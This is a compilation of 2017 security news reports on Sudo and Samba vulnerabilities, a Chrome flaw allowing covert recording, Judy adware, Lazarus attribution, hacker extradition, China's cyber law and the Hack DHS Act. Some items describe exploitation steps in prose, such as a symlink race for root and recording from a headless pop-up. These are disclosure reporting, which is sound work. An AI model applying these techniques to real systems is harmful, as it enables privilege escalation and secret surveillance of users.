The issue was found to affect all Sudo versions from 1.8.6p7 through 1.8.20 and was resolved in Sudo 1.8.20p1.


Ohio Companies Unite to Share Threat Intelligence

1.6.2017 securityweek Security
Cybersecurity is a form of asymmetric warfare. The attackers need to only succeed once; the defenders must succeed constantly. The attackers share weapons and methods continuously; the defenders are often isolated silos of private knowledge that comes only from the attacks against themselves. Threat intelligence sharing between the defenders is a primary method of reducing the attackers' inherent asymmetric advantage.

But intelligence sharing is difficult, comprising both human and technology problems. The human element is largely around 'trust' -- with whom can you share potentially sensitive commercial information. The technology problem involves constraining the shared data to intended recipients and ensuring there is no breach of data protection regulations.

These problems have been successfully tackled by seven Fortune 500 companies in Columbus Ohio. They came together in 2014 to form and capitalize the Columbus Collaboratory -- an Information Sharing and Analysis Organization (ISAO). As a private and voluntary ISAO, they solved the 'human' problem. Last week they adopted the TruStar intelligence sharing platform to solve the technology problem.

The Collaboratory comprises seven major non-competitive firms in several separate sectors: Nationwide Insurance, Cardinal Health, LBrands (which includes Victoria's Secret, and Bath & Body Works), Huntington Bank, OhioHealth, American Electric Power, and Batelle. It was formed with $28 million commitment from the members, and a $5 million Ohio Third Frontier Grant.

The non-competitive nature is important. "Columbus lends itself to such an approach," Jeff Schmidt, VP and chief cyber security innovator, told SecurityWeek. "It's an important commercial center, but is not dominated by any one vertical." This allows the members to come together with no fear of disclosing sensitive data to competitors. While Schmidt sees the group potentially growing with new members, he doesn't believe the non-competitive element will ever change.

One of the first things Schmidt did when he joined the organization in October 2016 was to bring the liaison officers from the different companies together. "Nothing encourages trust more than face-to-face meetings," he said -- drawing perhaps from his earlier experience as Director at the InfraGard National Members Alliance.

The Collaboratory offers its members three primary services: cybersecurity, advanced analytics and talent solutions. "By sharing threat intelligence," he said, "we can break out of the silo model, pool ideas and resources, and better protect against cybersecurity threats." But, he added, "One of the nice features is that being completely private, there is no mandatory reporting from the Collaboratory to any outside agency, such as the FBI. In that way, it is different than other government-sponsored information sharing platforms."

These other platforms include ISACs (created by the DHS) and InfraGard (created by the FBI). "We've seen what works and what doesn't work," he said. "A lot of the inhibitors to effective information sharing are legal and philosophical -- if I share this information is the FBI or the NSA going to get it. Removing that variable is a net help." The individual members, many designated as part of the national critical infrastructure, may have their own vertical reporting responsibilities -- but the Collaboratory itself has none.

The final piece of the puzzle came into place last week with the adoption of the TruSTAR information exchange platform. "There is a common desire in business to share intelligence," commented Paul Kurtz, former cybersecurity advisor to the White House and now co-founder and CEO of TruSTAR, "but those legal and philosophical inhibitors have made it difficult."

The TruSTAR platform provides a walled enclave where data can be shared with just the Collaboratory members. Data can be redacted before sharing -- indeed, TruSTAR will automatically detect any likely PII with a point, click and redact facility to prevent its sharing -- and anonymized to prevent attribution. Only data specifically allowed for wider sharing can leave the enclave to be shared among the wider TruSTAR community. In this way, it maximizes sharing both between the members and with the wider community, while protecting any data that should not be shared. This is further enhanced with TruSTAR's selective version capability.

"If members wish to share a redacted document within the Collaboratory, and a more redacted version with the Wider TruSTAR community," added Schmidt, "then TruSTAR can accommodate selective version sharing."

For the most part, the shared information will be indicators of compromise, behaviors, patterns, attackers' infrastructures and not PII. If any PII slips in it can be redacted. In this way, Schmidt believes that the members can stay the right side of data protection regulations, including GDPR when it arrives next year. If anything, the structure imposed upon shared data is likely to make breach notification simpler and more efficient; making it easier for members to comply with GDPR's 72-hour notification requirement.

It's early days for the Columbus Collaboratory; but does the theory work in practice? "Yes," said Kurtz. "One example was a firm that thought it had a staff problem only to find that other companies were having the same problem. It wasn't staff, it was subtle indications of an intruder that only became apparent through intelligence sharing."

The Columbus Collaboratory, aided in this instance by the TruSTAR sharing platform, is unique. But it is an example to other regions where different companies can come together and share their threat intelligence, safely, securely, compliant with data protection regulations, and with no three-letter agency inhibitions.


A recently discovered Linux flaw could be exploited by Sudo Users to gain Root Privileges
1.6.2017 securityaffairs Vulnerebility

Security researchers at Qualys Security have discovered a Linux Flaw that could be exploited to escalate privileges and overwrite any file on the filesystem.
Security researchers at Qualys Security have discovered a Linux flaw that could be exploited to gain root privileges and overwrite any file on the filesystem on SELinux-enabled systems.

The high severity flaw, tracked as CVE-2017-1000367, resides in the Sudo’s get_process_ttyname() for Linux and is related to the way Sudo parses tty information from the process status file in the proc filesystem.

The Linux flaw could be exploited by a local user with privileges to execute commands via Sudo and could allow attackers to escalate their privileges to root.

The Sudo’s get_process_ttyname() function opens “/proc/[pid]/stat” (man proc) and reads the device number of the tty from field 7 (tty_nr). These fields are space-separated, the field 2 (comm, the filename of the command) can contain spaces.

Sudoer users on SELinux-enabled systems could escalate their privileges to overwrite any file on the filesystem with their command’s output, including root-owned files.

“We discovered a vulnerability in Sudo’s get_process_ttyname() for Linux: this function opens “/proc/[pid]/stat” (man proc) and reads the device number of the tty from field 7 (tty_nr). Unfortunately, these fields are space-separated and field 2 (comm, the filename of the command) can contain spaces (CVE-2017-1000367).” reads the security advisory. “On an SELinux-enabled system, if a user is Sudoer for a command that does not grant him full root privileges, he can overwrite any file on
the filesystem (including root-owned files) with his command’s output,
because relabel_tty() (in src/selinux.c) calls open(O_RDWR|O_NONBLOCK)
on his tty and dup2()s it to the command’s stdin, stdout, and stderr.
This allows any Sudoer user to obtain full root privileges.”

To exploit the issue, a Sudo user would have to choose a device number that doesn’t exist under “/dev”. If the terminal isn’t present under the /dev/pts directory when the Sudo performs a breadth-first search of /dev, the user could allocate a pseudo-terminal between the two searchers and create a “symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm,”

“Exploiting the bug requires that the user already have sudo privileges. SELinux must also be enabled on the system and sudo must have been built with SELinux support.
To exploit the bug, the user can choose a device number that does not currently exist under /dev. If sudo does not find the terminal under the /dev/pts directory, it performs a breadth-first search of /dev. It is possible to allocate a pseudo-terminal after sudo has checked /dev/pts but before sudo performs its breadth-first search of /dev. The attacker may then create a symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm.” read a Sudo alert.

linux flaw

“This file will be used as the command’s standard input, output and error when an SELinux role is specified on the sudo command line. If the symbolic link under /dev/shm is replaced with a link to an another file before it is opened by sudo, it is possible to overwrite an arbitrary file by writing to the standard output or standard error. This can be escalated to full root access by rewriting a trusted file such as /etc/shadow or even /etc/sudoers.”

The Linus flaw affects all Sudo versions from 1.8.6p7 through 1.8.20, the Sudo 1.8.20p1 fixes it, the issue was rated with a CVSS3 Base Score of 7.8.


Chrome design flaw allows sites to record Audio/Video without indication
1.6.2017 securityaffairs Vulnerebility

A developer has discovered a flaw in the Chrome browser that could be exploited to secretly Record Audio/Video without indication.
The AOL developer Ran Bar-Zik discovered a disconcerting vulnerability in Google’s Chrome browser could be exploited by attackers to record audio or video without giving any visual notification or alert.

“After getting the audio\video usage permissions for WebRTC. JS code can record video\audio without showing the graphical red dot in the tab when the record process is running. i.e. – after the permission is given the site can listen to the user whenever he want to. It is done because JS `window.open` method does not give visual indication on record init. ” reads the security advisory.

Web browser based audio-video communications use WebRTC (Web Real-Time Communications) protocol to enable real-time communication over peer-to-peer connections without the use of plugins.

However, to protect unauthorised streaming of audio and video without user’s permission, the web browser first request users to explicitly allow websites to use WebRTC and access device the camera and the microphone installed on the host. Once granted, a website will have the access to both camera and microphone until the user will explicitly revoke WebRTC permissions.

Modern browsers notify users when audio or video is being recorded in order to prevent abuses even by previously ‘authorised’ websites.

In Google Chrome, users are notified with a red dot icon that appears on the tab.

“Activating this API will alert the user that the audio or video from one of the devices is being captured. Chrome and Firefox implemented this alert (Recording media is not available in Edge yet).” Bar-Zik wrote on a Medium blog post. “This record indication is the last and the most important line of defense. The general video\audio device permission is required one time only and user can err and grant it by mistake. Once you granted it, that’s it. The record alert is given on ANY stream record usage and will prevent any record without the user knowledge. “

The researcher discovered that new HTML5 video\audio API has privacy issues on desktop Chrome allowing to hackers to use the PC as a surveillance device.

The expert demonstrated that after granting the general access from the user it is possible to activate the MediaRecorder from a headless window opened.

chrome hacking
“Developers can exploit small UX manipulation to activate the MediaRecorder API without alerting the users. The process is quite simple.” reads the analsysis shared by the expert. “After granting the general access from the user — Open a headless window and activate the MediaRecorder from that window. In Chrome there will be no visual record indication.”

The issue is related to a design flaw in Chrome that doesn’t display a red-dot indication on headless windows, allowing site developers to “exploit small UX manipulation to activate the MediaRecorder API without alerting the users.”

Bar-Zik also published a proof-of-concept (PoC) code and a demo website that asks the user for permission to use WebRTC, opens a pop-up, and then records 20 seconds of audio without giving any indication to the user.

The demo website has two buttons on a page, the first one is used to ask the device permission like many websites on the web. The second button launches the attack, after 30 seconds users can download MP3.

In a real attack, hackers can use very small pop-under and submit the data anywhere and close it when the user is focusing on it.

“It can use very small pop-under and submit the data anywhere and close it when the user is focusing on it. It can use the camera for millisecond to get your picture. It can (In theory) use XSS to ride on legitimate sites and their permissions.” Bar-Zik concluded.

The reported design issue affects Google Chrome, we cannot exclude its presence also in the implementation of other web browsers. The researcher reported the bug to Google on April 10, 2017, but the company doesn’t classify the issue as a security vulnerability.

it plans to fix the issue in the future, but not immediately.

“This isn’t really a security vulnerability – for example, WebRTC on a mobile device shows no indicator at all in the browser,” a Chromium member replied to the report. “The dot is a best-first effort that only works on the desktop when we have chrome UI space available. That being said, we are looking at ways to improve this situation.”

To protect your PC disable the WebRTC.


Judy Doesn’t Love You – Judy Malware has a sweet name but may have infected 36 million users
1.6.2017 securityaffairs Android

Experts found a new malware, dubbed Judy malware, in the Play Store, it is designed to infect Android devices and generate false clicks on advertisements.
Google is suffering once again from malicious software applications found inside popular apps available on Play store. The new malware – code named “Judy” – is designed to infect Android devices and generate false clicks on advertisements. According to Checkpoint Software, which discovered Judy, the payoff for the malware developers is to generate revenue on the false advertising clicks.

The new malicious app bypassed Google checks and may have been inside 41 popular games on the Play store for years, infecting as many as 36 million users.

“Check Point researchers discovered another widespread malware campaign on Google Play, Google’s official app store. The malware, dubbed “Judy”, is an auto-clicking adware which was found on 41 apps developed by a Korean company. ” states the analysis published by CheckPoint. “The malicious apps reached an astonishing spread between 4.5 million and 18.5 million downloads. ” “We also found several apps containing the malware, which were developed by other developers on Google Play.” “These apps also had a large amount of downloads between 4 and 18 million, meaning the total spread of the malware may have reached between 8.5 and 36.5 million users.”

The tainted software packages containing the malware were developed by a Korean company and have all been pulled from the Google Play Store. Several other vendor packages have also been pulled that reportedly contained the same malware code. However, it is not clear if these apps were intentionally designed with the Judy malware or simply suffered the same fate because of shared code.

judy Malware Android

The disclosure comes on the heels of two similar malware programs, “Falseguide” and “Skinner” which bypassed Google’s safety and check system. All the malware designs appear to be similar in that they used communications links with a Command and Control server for operation. Once the link was established, the Command Server would then download the malicious software on the unsuspecting user.

The malware developers first would design and upload a bait program to the Google Play Store. Most of the bait apps used by Judy appear to be games or simulated doll dress designs aimed at children. The bait programs would appear to be innocent to the user and pass the Google checking system since they contained no malicious code. The apps apparently look valid because they are designed to communicate with a specific URL for additional user game data such as updated dress designs for children’s dolls. Both the user and Google were unaware that the URL was actually a link to the malicious Command server.

One a user downloaded and started the app, the command server would infect the unknowing user with a silent and invisible web browser using JavaScript. The malware used the JavaScript code to locate and click on banners from Google ads once a targeted series of websites are launched inside the silent web browser. The silent browser would then simulate a computer by clicking on the paying advertisements and banners. Each infected user would then unknowingly be clicking thousands of times a day against advertisements. The fake clicks against the websites generated revenue for the malware developer cheating the paying advertisers.

One feature of Judy, however, was that some of the spammed ads also required the user to click on them in order to get the home screen functional again. While many of the apps were apparently popular, some of them received 4 and 5-star reviews, users often complained about the large number of ads that they were seeing. This tell-tale clue should have been a warning sign that the apps were doing more than simply dressing simulated dolls.

According to Checkpoint, the malware apps were all developed by a single Korean company named Kiniwini, registered on Google Play as ENISTUDIO corp.

“The company develops mobile apps for both Android and iOS platform,” states the Checkpoint bulletin.

“It is quite unusual to find an actual organization behind mobile malware, as most of them are developed by purely malicious actors. It is important to note that the activity conducted by the malware is not borderline advertising, but definitely an illegitimate use of the users’ mobile devices for generating fraudulent clicks, benefiting the attackers.”

Google has recently attempted to beef-up its Play Store, releasing new privacy and security guidelines to developers and increasing checks against potentially malevolent software apps. However, the use of a secondary communications system seems to bypass security checks since Google cannot see the hidden malware stored on a separate Command server during the upload and activation process for developers.

It is not unusual for app developers to utilize a communications link to specific URLs. Many games and user applications require a link in order to update common data, generate game revenue and add additional features. The design of using a malicious Command server to install functioning malware is something that previously had been reserved for intelligence agencies and criminal hacker organizations.

While, the abuse of millions of users to generate illegal income via hidden clicks on paying ads is not entirely new, there are darker possible designs that can target the individual users with more than just advertisements; stealing financial information, violating privacy, stalking and tracking. Both Google and Apple should take note of this new design that can bypass traditional upload and install security features of their store fronts.


LinkedIn Hacker, Wanted by US & Russian, Can be Extradited to Either State
31.5.2017 thehackernews Social
The alleged Russian hacker, who was arrested by the Czech police in Prague last October on suspicion of massive 2012 data breach at LinkedIn, can be extradited to either the United States or Russia, a Czech court ruled on Tuesday.
Yevgeniy Aleksandrovich Nikulin, a 29-years-old Russian national, is accused of allegedly hacking not just LinkedIn, but also the online cloud storage platform Dropbox, and now-defunct social-networking company Formspring.
However, he has repeatedly denied all accusations.
Nikulin was arrested in Prague on October 5 by the Czech police after Interpol issued an international arrest warrant against him.
Nikulin appeared at a court hearing held inside a high-security prison in Prague on Tuesday and emaciated after eight months in solitary confinement.
The court ruling, pending appeals, left the final decision in the hands of Czech Justice Minister Robert Pelikan, who can approve extradition to one of the countries and block the other.
The United States has requested Nikulin extradition for carrying out hacking attacks and stealing information from several American social networking companies, including LinkedIn, Dropbox, and Formspring, between March 2012 to July 2012.
However, Russia, where Nikulin is facing a lesser charge, has requested his extradition on a separate cyber theft charge of stealing $3,450 via the Internet in 2009.
"Both [case] documents are very, very sufficient for reasonable suspicion that [the offenses] took place and that there is a reason to press charges," the judge said.
Hacker Claims FBI Pressured Him to Confess to US Election Hacks
Nikulin's arrest last October came three days before the United States officially accused Russia of hacking the Democratic National Committee (DNC) and interfering in the 2016 presidential election.
Nikulin's lawyer says the case is a set-up, indicating that his arrest may have deeper inclinations than over the cyber attacks against American firms.
The Guardian reported Nikulin was interrogated in Prague, where he currently remains imprisoned, by FBI special agent Jeffrey Miller.
Nikulin wrote in a letter from prison that during his interrogation, Miller reportedly brought up the US election hacking and claimed that the FBI agent pressured him to admit to the DNC hack and promised him good treatment if he accepted to cooperate.
Nikulin wrote in the letter that he rejected the offer. His lawyer indicated that Nikulin was not a hacker, but just a victim of an FBI plot.
"Do you really imagine that a high-ranking FBI agent is going to travel all the way from San Francisco just to read this guy his rights?," Nikulin lawyer said.
Mark Galeotti, a senior security researcher at the Institute of International Relations Prague, also showed his concern about an FBI agent traveling to another country to extradite a hacker.
"An FBI agent traveling from the US to a third country as part of an extradition request is extremely unusual and highlights that the case is seen as significant," Galeotti said, as quoted by the Guardian.
Nikulin's Russian lawyer stated that his client's life revolved around buying and selling luxury cars, adding that Nikulin was "useless with computers" and capable of checking his email and no more and, far from being a super-hacker who can hack big firms.
Tuesday's court hearing was held in a tiny room inside the prison for security reasons, to which Nikulin’s Czech lawyer said: "In all my 25 years as a lawyer, I don’t remember any cases being tried inside the prison, including serial killers or organized crime cases."
Now, the final decision is in the hands of the Czech Justice Minister Robert Pelikan, who is slated to decide where Nikulin will be extradited: The United States, where he can face a "disproportionately harsh" sentence of 54 years behind bars, or Russia, where he faces a lesser charge of cyber theft.


Vendors Investigating Impact of Samba Vulnerability

31.5.2017 securityweek  Vulnerebility
Companies that provide network-attached storage (NAS) appliances, routers and other types of networking devices have started investigating the impact of a recently disclosed Samba vulnerability on their products.

Updates released last week for Samba, the software suite that provides file and print sharing capabilities between Windows and Unix computers, address a remote code execution flaw (CVE-2017-7494) that affects all versions of the product since 3.5.0, released in March 2010. The fix is included in Samba versions 4.6.4, 4.5.10 and 4.4.14, and a workaround has been made available for unsupported versions.

The security hole can be exploited by a malicious client to upload a shared library to a writable share, and then cause the server to load and execute that library.

While some have compared the vulnerability to the SMB weakness exploited in the recent WannaCry ransomware attacks – due to the fact that one of the protocols implemented by Samba is SMB – others believe CVE-2017-7494 is not as dangerous and there have been no reports of attacks in the wild.

On the other hand, proof-of-concept (PoC) exploits have been released and Rapid7 has identified roughly 110,000 Internet-connected devices running vulnerable versions of Samba.

Samba is used in many products, including routers, NAS systems, servers and IoT devices, and several vendors have already started releasing patches and workarounds.

Cisco has so far only identified two vulnerable products: the Cisco Network Analysis Module and the Cisco Video Surveillance Media Server. The list of products still under investigation includes routers, network and content security, unified computing, communications, and video and telepresence solutions.

NETGEAR informed customers that CVE-2017-7494 affects all its ReadyNAS, all ReadyDATA, and several C, R and N series routers. The company has already released firmware fixes for ReadyNAS 6.x. Until patches become available for other devices, users have been advised to disable write access to shared drives, and remove any USB storage devices connected to their routers or gateways.

QNAP and Synology have also started releasing patches for their affected products, but WD does not appear to have published any security advisories, despite several forum posts on this topic.

Veritas has informed customers that it’s working on patches for its NetBackup Appliances. NetApp has determined that the Samba vulnerability only affects its StorageGRID products, for which the company has released workarounds.

Sophos and F5 Networks told users that their products are not vulnerable to attacks exploiting this flaw.


China to Launch Cybersecurity Law Despite Concerns

31.5.2017 securityweek BigBrothers
Beijing - China will implement a controversial cybersecurity law Thursday despite concerns from foreign firms worried about its impact on their ability to do business in the world's second largest economy.

Passed last November, the law is largely aimed at protecting China's networks and private user information at a time when the recent WannaCry ransomware attack showed any country can be vulnerable to cyber threats.

But companies have pleaded with the government to delay the legislation's implementation amid concerns about unclear provisions and how the law would affect personal information and cloud computing.

The government appears to still be scrambling to finalize the rules.

Just two weeks ago, Zhao Zeliang, director of the cybersecurity bureau, gathered some 200 representatives from foreign and domestic companies and industry associations at the new headquarters of the Cybersecurity Administration of China (CAC) in Beijing.

The May 19 discussion centred on a draft of the rules for transferring personal data overseas, participants told AFP.

Attendees received an updated version of the document, as well as Zhao's assurance that regulators would remove some of the language that had received strong objections, they said.

The new document, obtained by AFP, removed a contentious requirement for companies to store customers' personal data in China.

- 'Headaches for companies' -

But concerns remain.

"The regulator is unprepared to enforce the law" and it is "very unlikely" anything will happen on June 1, said one participant, who asked for anonymity to discuss the sensitive issue.

That impression was only strengthened a few days after the meeting, when authorities issued 21 new draft documents describing national standards on topics from cloud computing to financial data, noting they would be available for public comment until July 7.

More new drafts, including detailed guidelines on cross-border data transfers, were published Saturday.

It is "crystal clear that the regulatory regime is evolving and does not simply switch on like a light June 1", said Graham Webster, an expert on Sino-US relations at Yale Law School.

Beijing, he said, is "wrestling with legitimate challenges that every country faces, and ... much of the caution and ambiguity comes from a desire to get things right."

But the process is causing "headaches for companies, Chinese and foreign alike".

- Protecting 'national honour' -

China already has some of the world's tightest controls over web content, protected by what is called "The Great Firewall", but even some of its universities and petrol stations were hit by the global ransomware attack in May.

The draft cybersecurity rules provided at the CAC meeting address only one part of the sweeping law.

The legislation also bans internet users from publishing a wide variety of information, including anything that damages "national honour", "disturbs economic or social order" or is aimed at "overthrowing the socialist system". Companies are worried that the new law could lock them out of the market.

Paul Triolo, a cybersecurity expert at the Eurasia Group, wrote in a research note that regulators will likely introduce "new hurdles for foreign company compliance and operations" in industries, such as cloud computing, where China is actively seeking a competitive advantage.

As a result, "companies with politically well-connected competitors could see their profile raised for things such as cybersecurity reviews".

The European Union Chamber of Commerce, among other groups, has urged Beijing to "delay the implementation of either the law or its relevant articles".

It "will impose substantial compliance obligations on industry" and "cautious, sound, consistent and fully reasoned supporting mechanisms related to its implementation are essential," the group said in a statement last week.

The chamber called on policymakers to follow a "transparent" process that will help eliminate "discriminatory market access barriers".

While there is no indication the law itself will be pushed back, the draft rules distributed at the CAC meeting says companies will have until December 31, 2018 to implement some of its requirements.

"It's been enormously difficult for our companies to prepare for the implementation of the cybersecurity law, because there are so many aspects of the law that are still unclear," said Jake Parker, vice president of the US-China Business Council.

"There's not enough information for companies to be able to develop internal compliance practices."


A new report links North Korea to the Lazarus APT Group
31.5.2017 securityaffairs APT

Moscow-based threat intelligence firm Group-IB published a report that details evidence linking the Lazarus APT Group to North Korea.
Researchers at security firm Group-IB released a report that links the notorious Lazarus APT to North Korea.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.

According to the experts from Group-IB, the attacks against the SWIFT systems used by banks worldwide left the most clues.

The Lazarus APT group conducted massive reconnaissance operations before the banks attack in order to gather information on the infrastructure of the targets.

“We have detected and thoroughly analyzed the C&C infrastructure used by Lazarus,” explained Dmitry Volkov, Head of Threat Intelligence Department. “Our research shows how hackers gained access to the banks’ information systems, what malware they used, and who their attempts were aimed at.”

Investigating the Group-IB activity the researchers analyzed the complex botnet infrastructure used by the hackers.
To make harder the investigation of the attribution of the attacks, the cyberspies used a three-layer architecture of compromised servers that communicate through SSL encrypted channels.

“In addition to encrypted traffic, data sent through SSL channel was additionally encrypted. The attackers achieved anonymity by employing a legitimate VPN client – SoftEther VPN. In some cases, they also used corporate web servers that were part of the attacked infrastructure.” states the report published by Group-IB.

Lazarus APT 3-Layer Architecture

According to the researchers, the APT group changed its TTPs after the publication of the Operation Blockbuster report that revealed much information about the activity of the crew.

“According to our investigation of the Lazarus infrastructure, the threat actors connected to the end C&C layer (Layer3) from two North Korean IP addresses 210.52.109.22 and 175.45.178.222. The second IP-address relates to Potonggang District, perhaps coincidentally, where National Defence Commission is
located — the highest military body in North Korea” continues the report.

Investigating the Lazarus attack, Group-IB discovered the hackers used two IP addresses belonging to the C&C server infrastructure.

The first is 210.52.109.22 is assigned to a company in China named China Netcom, but according to Group-IB’s sources the range of IPs 210.52.109.0/24 was assigned to North Korea

The second IP address, 175.45.178.222, points to North Korean Internet service provider because it is allocated to the Potonggang District. This is the same District where the military National Defence Commission is located.

“210.52.109.22 belongs to an autonomous system China Netcom. However, some sources indicate that the set of IPs 210.52.109.0/24 is assigned to North Korea. 175.45.178.222 refers to a North Korean Internet service provider. The Whois service indicates that this address is allocated to the Potonggang District, perhaps coincidentally, where Natinal Defence Commission is located — the highest military body in North Korea”

The researchers also discovered that the Lazarus APT Group is masquerading its operations as Russian hackers. The group used false flags in its malware to deceive the investigators and to attribute the attack to the Russian hackers.

Group-IB experts, like peers from security firm BAE, discovered Russian words in the source code of the malware, but they noticed an incorrect use of the words.

Hackers also leveraged Flash and Silverlight exploits used by Russian state-sponsored hackers, they also used the Enigma Protector, an anti-tampering system for executable files developed by a Russian company.

“They added specific debugging symbols and strings containing Russian words to a new version of Client_TrafficForwarder, a
module designed to proxy network traffic.” continues the report. “To protect their executables, they used Enigma Protector, a commercial product, which was created by a Russian software developer. They also used exploits for Flash and SilverLight from sets of exploits created by Russian-speaking hackers. These masquerade techniques did initially mislead some researchers who conducted express analysis of malicious code.”

I don’t want to tell you more, for more details on the Group-IB investigation give a look at the interesting report that also includes IOCs about the malware used in recent operations attributed to the Lazarus Group.


Chrome Flaw Allows Sites to Secretly Record Audio/Video Without Indication
30.5.2017 thehackernews Vulnerebility
Websites On Chrome Can Secretly Record Audio/Video Without Indication
What if your laptop is listening to everything that is being said during your phone calls or other people near your laptop and even recording video of your surrounding without your knowledge?
Sounds really scary! Isn't it? But this scenario is not only possible but is hell easy to accomplish.
A UX design flaw in the Google's Chrome browser could allow malicious websites to record audio or video without alerting the user or giving any visual indication that the user is being spied on.
AOL developer Ran Bar-Zik reported the vulnerability to Google on April 10, 2017, but the tech giant declined to consider this vulnerability a valid security issue, which means that there is no official patch on the way.
How Browsers Works With Camera & Microphone

Before jumping onto vulnerability details, you first need to know that web browser based audio-video communication relies on WebRTC (Web Real-Time Communications) protocol – a collection of communications protocols that is being supported by most modern web browsers to enable real-time communication over peer-to-peer connections without the use of plugins.
However, to protect unauthorised streaming of audio and video without user's permission, the web browser first request users to explicitly allow websites to use WebRTC and access device camera/microphone.
Once granted, the website will have access to your camera and microphone forever until you manually revoke WebRTC permissions.
In order to prevent 'authorised' websites from secretly recording your audio or video stream, web browsers indicate their users when any audio or video is being recorded.
"Activating this API will alert the user that the audio or video from one of the devices is being captured," Bar-Zik wrote on a Medium blog post. "This record indication is the last and the most important line of defense."
In the case of Google Chrome, a red dot icon appears on the tab, alerting users that the audio or video streaming is live.
How Websites Can Secretly Spy On You

The researcher discovered that if any authorised website pop-ups a headless window using a JavaScript code, it can start recording audio and video secretly, without the red dot icon, giving no indications in the browser that the streaming is happening.
"Open a headless window and activate the MediaRecorder from that window. In Chrome there will be no visual record indication," Bar-Zik said.
This happens because Chrome has not been designed to display a red-dot indication on headless windows, allowing site developers to "exploit small UX manipulation to activate the MediaRecorder API without alerting the users."
Bar-Zik also provided a proof-of-concept (PoC) code for anyone to download, along with a demo website that asks the user for permission to use WebRTC, launches a pop-up, and then records 20 seconds of audio without giving any visual indication.
All you need to do is click on two buttons to allow the website to use WebRTC in the browser. The demo records your audio for 20 seconds and then provides you a download link for the recorded file.
"Real attack will not be very obvious of course. It can use very small pop-under and submit the data anywhere and close it when the user is focusing on it. It can use the camera for millisecond to get your picture," Bar-Zik said. "In Mobile, there is not such visual indication."
The reported flaw affects Google Chrome, but it may affect other web browsers as well.
It's Not A Flaw, Says Google; So No Quick Patch!
Bar-Zik reported the security issue to Google on April 10, 2017, but the company doesn't consider this as a valid security vulnerability. However, it agrees to find ways to "improve the situation" in the future.
"This isn't really a security vulnerability – for example, WebRTC on a mobile device shows no indicator at all in the browser," a Chromium member replied to the researcher's report.
"The dot is a best-first effort that only works on the desktop when we have chrome UI space available. That being said, we are looking at ways to improve this situation."
Google consider this a security vulnerability or not, but the bug is surely a privacy issue, which could be exploited by hackers to potentially launch more sophisticated attacks.
In order to stay on the safer side, simply disable WebRTC which can be done easily if you don't need it. But if you require the feature, allow only trusted websites to use WebRTC and look for any other windows that it may spawn afterward on top of that.
Edward Snowden leaks also revealed Optic Nerve – the NSA's project to capture webcam images every 5 minutes from random Yahoo users. In just six months, 1.8 Million users' images were captured and stored on the government servers in 2008.
Following such privacy concerns, even Facebook CEO Mark Zuckerberg and former FBI director James Comey admitted that they put tape on their laptops just to be on the safer side.
Although putting a tape over your webcam would not stop hackers or government spying agencies from recording your voice, at least, it would prevent them from watching or capturing your live visual feeds.


Hack DHS Act Establishes Bug Bounty Program for DHS

30.5.2017 securityweek  BigBrothers
Following what is now widespread practice among private industry tech giants, a new bill proposes to force the DHS to introduce its own public-sector bug bounty program.

Senators Maggie Hassan (D-NH) and Rob Portman (R-OH) introduced the Hack Department of Homeland Security (DHS) Act on 25 May. Designated S.1281, it is described as "A bill to establish a bug bounty pilot program within the Department of Homeland Security, and for other purposes."

At the time of writing, there is no publicaly published text for the bill. Nevertheless, congress.gov lists it as having been read twice and referred to the Committee on Homeland Security and Governmental Affairs.

Hassan publicly announced the new bill on Friday. She described it as designed to "strengthen cyber defenses at DHS by utilizing 'white-hat' or ethical hackers to help identify unique and undiscovered vulnerabilities in the DHS networks and data systems." It is modeled on the bug bounty programs of the tech industry, and last year's 'hack the Pentagon' and 'hack the Army' programs.

Spanning April and May 2016, the Department of Defense (DoD) ran 'Hack the Pentagon' via HackerOne. It attracted more than 1400 hackers; 250 of whom submitted at least one vulnerability report. 138 were judged valid and eligible for a bounty from the program's $150,000 funding. Ash Carter, Secretary of Defense at the time, estimated that the program saved the department more than $800,000 against the cost of a similar exercise via the security industry.

Since then both the Army and the Air Force have engaged similar programs. Hack the Army ran from the end of November to 21 December 2016. 371 white-hat hackers registered and submitted a total of 471 vulnerability reports. Nearly 120 were adjudged actionable and were awarded a total of more than $100,000.

Hack the Air Force was announced in April 2017, and registrations opened on 15 May. The event will take place between May 30 and June 23, and is open to researchers from any of the Five Eyes nations: US, UK, Canada, Australia and New Zealand.

"Federal agencies like DHS are under assault every day from cyberattacks," explained Hassan in her statement Friday. "These attacks threaten the safety, security and privacy of millions of Americans and in order to protect DHS and the American people from these threats, the Department will need help. The Hack DHS Act provides this help by drawing upon an untapped resource -- patriotic and ethical hackers across the country who want to stop these threats before they endanger their fellow citizens."

"The networks and systems at DHS are vital to our nation's security," said Portman. "It's imperative that we take every step to protect DHS from the many cyber attacks they face every day. One step to do that is using an important tool from the private sector: incentivizing ethical hackers to find vulnerabilities before others do. I look forward to working with Senator Hassan to move this bipartisan bill forward and helping protect DHS from cyber threats."

The bill is getting cautious support from the private sector. "The proposed Hack DHS Act seems, on its surface, to be a very positive step forward to helping better secure the nation's websites and other web-facing infrastructure," Nathan Wenzler, chief security strategist at security consulting firm AsTech, told SecurityWeek. He pointed to the continuing success of bug bounties in the private sector. "Provided that appropriate measures are taken to vet the individuals who are performing the ethical hacking work, this could end up being a very valuable tool to help improve the security posture of some of the most heavily attacked sites out there."

Chris Roberts, chief security architect at threat detection firm Acalvio, takes a similar view. Provided that adequate checks are made against the registrants and strict rules are devised and enforced, then "yes, in the 'spirit' of hacking it's good."

But he warned, "Let's not devalue the red-team work and have someone hit the systems from all angles and all sides. That way there's a true perspective. The whole idea of hacking the DHS would be to focus on the weakest links, which are humans and third parties. I'm going to assume those are out of scope, which in reality, makes it kind of a waste of time. On paper, it's a good idea. But allow us to hit whenever and wherever we want, like a true attacker would and then let's talk. Until then, it's simply a face-saving thing which cheapens the whole assessment side of the world."


Czech Court OKs Hacker's Extradition to US or Russia

30.5.2017 securityweek  Cyber

Prague - A Czech court on Tuesday ruled Prague can extradite a Russian citizen sought by the US for alleged cyberattacks on social networks and also by his native Russia on fraud charges.

